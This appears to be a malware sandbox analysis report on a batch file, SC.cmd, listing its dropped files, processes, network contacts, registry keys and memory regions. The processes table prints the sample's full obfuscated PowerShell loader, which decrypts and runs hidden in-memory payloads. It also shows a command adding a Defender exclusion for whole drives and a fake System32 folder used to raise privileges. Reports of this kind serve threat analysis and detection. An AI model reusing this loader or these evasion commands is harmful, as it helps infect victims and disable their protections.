Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SC.cmd
|
ASCII text, with very long lines (57316), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\MLANG.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Windows \System32\MLANG.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x5c7bfbb4, page size 16384, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\SC.cmd
|
ASCII text, with very long lines (57316), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\SC.cmd:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wcht0wt.ff0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dvdztixh.2zr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghqbpv1w.qqk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jarfqu3x.qom.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jipkltf5.wrx.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pb4lcb2g.0w3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhongq2g.n5z.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj1vbbj1.xew.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows \System32\ComputerDefaults.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
||
|
\Device\ConDrv
|
ASCII text, with very long lines (2195), with CRLF line terminators
|
dropped
|
There are 15 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SC.cmd" "
|
|
|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create();
$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
$aes_var.Key=[System.Convert]::FromBase64String('t/6WxGFiWqzOYDiMeQW3vewy5Lst4QLmvh7FIz66oK8='); $aes_var.IV=[System.Convert]::FromBase64String('1xTnhp7Ji3XlXldEQfx/mg==');
$decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
$decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$bNhXj=New-Object
System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$FyATo=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*',
''); IEX '$ElTgO=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($bNhXj, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*',
''); $ElTgO.CopyTo($FyATo); $ElTgO.Dispose(); $bNhXj.Dispose(); $FyATo.Dispose(); $FyATo.ToArray();}function execute_function($param_var,$param2_var){
IEX '$dVsPd=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$DUzhZ=$dVsPd.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*',
''); IEX '$DUzhZ.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$EYouL = 'C:\Users\user\Desktop\SC.cmd';$host.UI.RawUI.WindowTitle
= $EYouL;$tjLTM=[System.IO.File]::ReadAllText($EYouL).Split([Environment]::NewLine);foreach ($xbxfP in $tjLTM) { if ($xbxfP.StartsWith('DzoRhmGmBqXlnTxyAcGU'))
{ $murOL=$xbxfP.Substring(20); break; }}$payloads_var=[string[]]$murOL.Split('\');$payload1_var=decompress_function (decrypt_function
([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function
([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function
([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function
$payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
|
|
|
|
C:\Windows \System32\ComputerDefaults.exe
|
"C:\Windows \System32\ComputerDefaults.exe"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://ipwho.is/
|
195.201.57.90
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 14 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
azure-winsecure.com
|
154.216.20.132
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
ipwho.is
|
195.201.57.90
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
154.216.20.132
|
azure-winsecure.com
|
Seychelles
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
||
|
195.201.57.90
|
ipwho.is
|
Germany
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FFD9B941000
|
trusted library allocation
|
page read and write
|
||
|
1BEEDE49000
|
heap
|
page read and write
|
||
|
4C0D7F000
|
stack
|
page read and write
|
||
|
1823BF2C000
|
heap
|
page read and write
|
||
|
1BE903FD000
|
trusted library allocation
|
page read and write
|
||
|
1823C230000
|
heap
|
page read and write
|
||
|
1BEF0002000
|
heap
|
page read and write
|
||
|
533B3AE000
|
stack
|
page read and write
|
||
|
18233D31000
|
trusted library allocation
|
page read and write
|
||
|
1D7D12D0000
|
heap
|
page read and write
|
||
|
DE00EF7000
|
stack
|
page read and write
|
||
|
1155000B000
|
heap
|
page read and write
|
||
|
2494C8CF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
144EE0D0000
|
heap
|
page read and write
|
||
|
249474A7000
|
heap
|
page read and write
|
||
|
F84AFF000
|
stack
|
page read and write
|
||
|
1823C220000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
|
249487A1000
|
trusted library allocation
|
page read and write
|
||
|
DE02AFE000
|
unkown
|
page readonly
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
18224C72000
|
trusted library allocation
|
page read and write
|
||
|
1155000B000
|
heap
|
page read and write
|
||
|
249474A0000
|
heap
|
page read and write
|
||
|
1BE81212000
|
trusted library allocation
|
page read and write
|
||
|
4C09EE000
|
stack
|
page read and write
|
||
|
1823C000000
|
heap
|
page execute and read and write
|
||
|
7FFD9B794000
|
trusted library allocation
|
page read and write
|
||
|
249474B4000
|
heap
|
page read and write
|
||
|
7FFD9B846000
|
trusted library allocation
|
page read and write
|
||
|
1BEEDE85000
|
heap
|
page read and write
|
||
|
2494C954000
|
trusted library allocation
|
page read and write
|
||
|
2494C97A000
|
trusted library allocation
|
page read and write
|
||
|
7FF64D60E000
|
unkown
|
page read and write
|
||
|
1BEEDD90000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
18221FB1000
|
heap
|
page read and write
|
||
|
24947517000
|
heap
|
page read and write
|
||
|
1BE80227000
|
trusted library allocation
|
page read and write
|
||
|
2494CEC0000
|
trusted library allocation
|
page read and write
|
||
|
1BEF00CC000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1BE90031000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
24E750A0000
|
heap
|
page read and write
|
||
|
B569FF000
|
stack
|
page read and write
|
||
|
1BEEF960000
|
heap
|
page execute and read and write
|
||
|
1BEF03A0000
|
heap
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
1BEF026E000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
4C10B8000
|
stack
|
page read and write
|
||
|
2494CAF3000
|
heap
|
page read and write
|
||
|
2494CB00000
|
heap
|
page read and write
|
||
|
1BE80BFA000
|
trusted library allocation
|
page read and write
|
||
|
1BE810C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
|
2494CAC5000
|
heap
|
page read and write
|
||
|
18223BE0000
|
heap
|
page readonly
|
||
|
18223D20000
|
heap
|
page read and write
|
||
|
1823C272000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
182258F0000
|
trusted library allocation
|
page read and write
|
||
|
249474FF000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
F8487C000
|
stack
|
page read and write
|
||
|
1BE81123000
|
trusted library allocation
|
page read and write
|
||
|
18225361000
|
trusted library allocation
|
page read and write
|
||
|
18223820000
|
heap
|
page read and write
|
||
|
2494C948000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
24E75202000
|
heap
|
page read and write
|
||
|
2494C86E000
|
trusted library allocation
|
page read and write
|
||
|
1BE90021000
|
trusted library allocation
|
page read and write
|
||
|
24E75200000
|
heap
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
249474A0000
|
heap
|
page read and write
|
||
|
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFFFD000
|
heap
|
page read and write
|
||
|
1823C2E0000
|
heap
|
page read and write
|
||
|
F8497F000
|
stack
|
page read and write
|
||
|
7DF464240000
|
trusted library allocation
|
page execute and read and write
|
||
|
2494C8AD000
|
trusted library allocation
|
page read and write
|
||
|
2494CA5B000
|
heap
|
page read and write
|
||
|
2494CA1F000
|
heap
|
page read and write
|
||
|
2494CACE000
|
heap
|
page read and write
|
||
|
2494C945000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
DE00DFE000
|
unkown
|
page readonly
|
||
|
2494C922000
|
trusted library allocation
|
page read and write
|
||
|
1155000B000
|
heap
|
page read and write
|
||
|
F84BFC000
|
stack
|
page read and write
|
||
|
2494CED0000
|
trusted library allocation
|
page read and write
|
||
|
18224113000
|
trusted library allocation
|
page read and write
|
||
|
533BBFC000
|
stack
|
page read and write
|
||
|
2494CAFB000
|
heap
|
page read and write
|
||
|
533B87D000
|
stack
|
page read and write
|
||
|
1BE80BEC000
|
trusted library allocation
|
page read and write
|
||
|
18223EEE000
|
trusted library allocation
|
page read and write
|
||
|
1155000B000
|
heap
|
page read and write
|
||
|
7FFD9B92A000
|
trusted library allocation
|
page read and write
|
||
|
144EDFDB000
|
heap
|
page read and write
|
||
|
1155000B000
|
heap
|
page read and write
|
||
|
1823BF8E000
|
heap
|
page read and write
|
||
|
1BEEFA64000
|
heap
|
page read and write
|
||
|
4C096E000
|
unkown
|
page read and write
|
||
|
18221F88000
|
heap
|
page read and write
|
||
|
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
|
24E75080000
|
heap
|
page read and write
|
||
|
1BEEFFE2000
|
heap
|
page read and write
|
||
|
11550000000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
A5ECCFE000
|
unkown
|
page readonly
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
24E75180000
|
heap
|
page read and write
|
||
|
24947413000
|
heap
|
page read and write
|
||
|
533C74C000
|
stack
|
page read and write
|
||
|
2494C880000
|
trusted library allocation
|
page read and write
|
||
|
1BEEDDC0000
|
heap
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
2494CAA9000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
2494C890000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1BEEDE87000
|
heap
|
page read and write
|
||
|
DE018FB000
|
stack
|
page read and write
|
||
|
24947D1A000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
18233DBE000
|
trusted library allocation
|
page read and write
|
||
|
4C0F3E000
|
stack
|
page read and write
|
||
|
F84A7B000
|
stack
|
page read and write
|
||
|
DE0093B000
|
stack
|
page read and write
|
||
|
2494C9A0000
|
trusted library allocation
|
page read and write
|
||
|
1BE902F8000
|
trusted library allocation
|
page read and write
|
||
|
2494C8B6000
|
trusted library allocation
|
page read and write
|
||
|
1D7D13C0000
|
heap
|
page read and write
|
||
|
2494C930000
|
trusted library allocation
|
page read and write
|
||
|
1154FFE2000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
2494CA90000
|
heap
|
page read and write
|
||
|
1BEEFEC0000
|
heap
|
page read and write
|
||
|
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
|
18221FB6000
|
heap
|
page read and write
|
||
|
249474A7000
|
heap
|
page read and write
|
||
|
1BEEE040000
|
heap
|
page readonly
|
||
|
A5EC87B000
|
stack
|
page read and write
|
||
|
24947473000
|
heap
|
page read and write
|
||
|
1BEEFF67000
|
heap
|
page read and write
|
||
|
1BE81DDF000
|
trusted library allocation
|
page read and write
|
||
|
2494C950000
|
trusted library allocation
|
page read and write
|
||
|
533BA79000
|
stack
|
page read and write
|
||
|
533B7F7000
|
stack
|
page read and write
|
||
|
18225A3A000
|
trusted library allocation
|
page read and write
|
||
|
2494748F000
|
heap
|
page read and write
|
||
|
1BEEF9C0000
|
heap
|
page execute and read and write
|
||
|
1BEF0280000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEEE13D000
|
heap
|
page read and write
|
||
|
1BEEE100000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BADC000
|
trusted library allocation
|
page read and write
|
||
|
1BEF0287000
|
heap
|
page read and write
|
||
|
249487D0000
|
trusted library allocation
|
page read and write
|
||
|
249474B4000
|
heap
|
page read and write
|
||
|
1155000B000
|
heap
|
page read and write
|
||
|
1BEF022C000
|
heap
|
page read and write
|
||
|
1822426E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
|
1BEEE080000
|
trusted library allocation
|
page read and write
|
||
|
2494C890000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAC4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD8000
|
trusted library allocation
|
page read and write
|
||
|
1823BEB4000
|
heap
|
page read and write
|
||
|
1BE80A52000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B954000
|
trusted library allocation
|
page read and write
|
||
|
7FF64D601000
|
unkown
|
page execute read
|
||
|
24E75213000
|
heap
|
page read and write
|
||
|
533B3EE000
|
stack
|
page read and write
|
||
|
1BE81E04000
|
trusted library allocation
|
page read and write
|
||
|
2494C9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B84C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1155001B000
|
heap
|
page read and write
|
||
|
2494CA4F000
|
heap
|
page read and write
|
||
|
4C0E7F000
|
stack
|
page read and write
|
||
|
24947C15000
|
heap
|
page read and write
|
||
|
533C84E000
|
stack
|
page read and write
|
||
|
A5ECAFE000
|
unkown
|
page readonly
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
144EDED0000
|
heap
|
page read and write
|
||
|
18233DA2000
|
trusted library allocation
|
page read and write
|
||
|
1823C007000
|
heap
|
page execute and read and write
|
||
|
18222075000
|
heap
|
page read and write
|
||
|
24948140000
|
trusted library allocation
|
page read and write
|
||
|
24E751B0000
|
trusted library allocation
|
page read and write
|
||
|
2494C8F1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
24947380000
|
heap
|
page read and write
|
||
|
D279FFF000
|
unkown
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
|
1BE812A6000
|
trusted library allocation
|
page read and write
|
||
|
2494C850000
|
trusted library allocation
|
page read and write
|
||
|
1BEF0102000
|
heap
|
page read and write
|
||
|
2494C861000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
1BE81892000
|
trusted library allocation
|
page read and write
|
||
|
7DF464260000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEF01E9000
|
heap
|
page read and write
|
||
|
1BEEDE6D000
|
heap
|
page read and write
|
||
|
7FF64D600000
|
unkown
|
page readonly
|
||
|
2494CA61000
|
heap
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
1BE81307000
|
trusted library allocation
|
page read and write
|
||
|
24947D13000
|
heap
|
page read and write
|
||
|
18223857000
|
heap
|
page read and write
|
||
|
2494747D000
|
heap
|
page read and write
|
||
|
1BEEF9B0000
|
trusted library allocation
|
page read and write
|
||
|
1BEF00D0000
|
heap
|
page read and write
|
||
|
4C11BE000
|
stack
|
page read and write
|
||
|
18224111000
|
trusted library allocation
|
page read and write
|
||
|
1BE90309000
|
trusted library allocation
|
page read and write
|
||
|
18222070000
|
heap
|
page read and write
|
||
|
1BEF028F000
|
heap
|
page read and write
|
||
|
2494C868000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFEF4000
|
heap
|
page read and write
|
||
|
7FF64D60B000
|
unkown
|
page readonly
|
||
|
144EFD70000
|
heap
|
page read and write
|
||
|
1BEF00D4000
|
heap
|
page read and write
|
||
|
24E7525C000
|
heap
|
page read and write
|
||
|
1D7D11F0000
|
heap
|
page read and write
|
||
|
2494CA54000
|
heap
|
page read and write
|
||
|
1BEF017C000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
1BEF0116000
|
heap
|
page read and write
|
||
|
2494C878000
|
trusted library allocation
|
page read and write
|
||
|
1155001B000
|
heap
|
page read and write
|
||
|
533B2A3000
|
stack
|
page read and write
|
||
|
24E7522B000
|
heap
|
page read and write
|
||
|
B568FF000
|
unkown
|
page read and write
|
||
|
1BEF0276000
|
heap
|
page read and write
|
||
|
1822594B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
2494C875000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFA60000
|
heap
|
page read and write
|
||
|
1BEEE135000
|
heap
|
page read and write
|
||
|
DE00CFE000
|
stack
|
page read and write
|
||
|
1D7D1300000
|
heap
|
page read and write
|
||
|
18222012000
|
heap
|
page read and write
|
||
|
1BE81094000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
|
1BEF026A000
|
heap
|
page read and write
|
||
|
1BEEDE40000
|
heap
|
page read and write
|
||
|
2494C930000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BEEFFC0000
|
heap
|
page read and write
|
||
|
4C0EF9000
|
stack
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFF52000
|
heap
|
page read and write
|
||
|
1BEEE050000
|
trusted library allocation
|
page read and write
|
||
|
1154FFEC000
|
heap
|
page read and write
|
||
|
18222040000
|
heap
|
page read and write
|
||
|
18223D31000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
|
24E75302000
|
heap
|
page read and write
|
||
|
2494C860000
|
trusted library allocation
|
page read and write
|
||
|
1BE811D9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B958000
|
trusted library allocation
|
page read and write
|
||
|
1BEF01E4000
|
heap
|
page read and write
|
||
|
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
|
1BE81E24000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
|
18223854000
|
heap
|
page read and write
|
||
|
1BEEDE66000
|
heap
|
page read and write
|
||
|
2494CA00000
|
heap
|
page read and write
|
||
|
249474FF000
|
heap
|
page read and write
|
||
|
B565CC000
|
stack
|
page read and write
|
||
|
24947C02000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
115501D0000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
1823C030000
|
heap
|
page read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFF73000
|
heap
|
page read and write
|
||
|
1BEF0272000
|
heap
|
page read and write
|
||
|
1823BD30000
|
heap
|
page read and write
|
||
|
11550000000
|
heap
|
page read and write
|
||
|
1823BF5D000
|
heap
|
page read and write
|
||
|
2494C8CC000
|
trusted library allocation
|
page read and write
|
||
|
7FF64D60F000
|
unkown
|
page readonly
|
||
|
1823BEF0000
|
heap
|
page read and write
|
||
|
2494CC00000
|
remote allocation
|
page read and write
|
||
|
1BE80086000
|
trusted library allocation
|
page read and write
|
||
|
24947495000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
A5ECBFD000
|
stack
|
page read and write
|
||
|
2494C860000
|
trusted library allocation
|
page read and write
|
||
|
D27A0FF000
|
stack
|
page read and write
|
||
|
2494C900000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B793000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
1BEEFF88000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
